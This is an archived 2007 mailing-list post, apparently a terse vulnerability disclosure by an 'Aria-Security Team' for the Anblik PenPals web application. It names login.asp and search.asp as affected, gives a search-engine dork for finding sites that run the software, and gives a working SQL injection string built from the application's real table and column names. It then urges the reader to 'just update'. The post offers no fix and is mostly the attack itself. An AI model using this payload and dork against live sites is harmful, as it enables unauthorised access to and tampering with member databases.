|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Aria-Security.Net: PenPals Login and search page SQL Injection
no-reply
Aria-Security.net
Date: Wed Dec 05 2007 - 23:26:58 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
---------------------------
Aria-Security Team
http://Aria-Security.Net
----------------------------
Original Advisory http://aria-security.net/forum/showthread.php?p=1148
Shout outs to : AurA T_L_O_T_D
http://ankoor.com/ [vendor]
Dork:[Powered By Anblik]
Affected fileS:
search.asp
login.asp
'group by penpal_memberdetails.memid,penpal_memberdetails.approve,penpal_memberdetails.mdoj,penpal_memberdetails.groupid,penpal_memberdetails.group_time_span having 1=1;--
Now just update.
Regards,
The-0utl4w
[credits goes to Aria-Security]
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]